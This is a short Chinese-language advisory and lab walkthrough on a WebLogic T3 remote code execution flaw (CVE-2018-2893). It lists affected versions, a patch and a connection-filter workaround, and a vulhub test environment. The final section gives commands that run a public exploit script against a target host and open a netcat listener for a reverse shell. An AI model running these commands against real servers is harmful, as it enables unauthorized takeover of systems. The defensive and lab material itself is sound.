漏洞分析
https://www.freebuf.com/column/178103.html
https://www.freebuf.com/vuls/177868.html
攻擊者可以在未授權的情況下遠程執行代碼。攻擊者只需要發送精心構造的T3協議數據,就可以獲取目標服務器的權限。攻擊者可利用該漏洞控制組件,影響數據的可用性、保密性和完整性。
影響范圍
Oracle WebLogic Server 10.3.6.0
Oracle WebLogic Server 12.1.3.0
Oracle WebLogic Server 12.2.1.2
Oracle WebLogic Server 12.2.1.3
修復方案
1.Oracle 官方已經在 7 月份中的補丁中修復了該漏洞,建議受影響的用戶盡快升級更新。
下載地址:http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
2.根據業務需求選擇禁用T3協議。
此漏洞產生於WebLogic的T3服務,因此可通過控制T3協議的訪問來臨時阻斷針對該漏洞的攻擊。當開放WebLogic控制台端口(默認為7001端口)時,T3服務會默認開啟。
具體操作:
(1)進入WebLogic控制台,在base_domain的配置頁面中,進入“安全”選項卡頁面,點擊“篩選器”,進入連接篩選器配置。
(2)在連接篩選器中輸入:weblogic.security.net.ConnectionFilterImpl,在連接篩選器規則中輸入:127.0.0.1 * * allow t3 t3s,0.0.0.0/0 * *deny t3 t3s(t3和t3s協議的所有端口只允許本地訪問)。
(3)保存后需重新啟動。
環境搭建
這個環境包含cve-2018-2893
https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-2628
漏洞復現
1.下載對應編號的檢測和利用腳本
https://github.com/zhzyker/exphub/tree/master/weblogic
利用檢測腳本存在cve-2018-2893
python cve-2018-2893_poc.py 目標ip 7001
漏洞利用
用法
python cve-2018-2893_cmd.py target_host target_port reverse_host reverse_port
監聽
nc -lvnp 7777
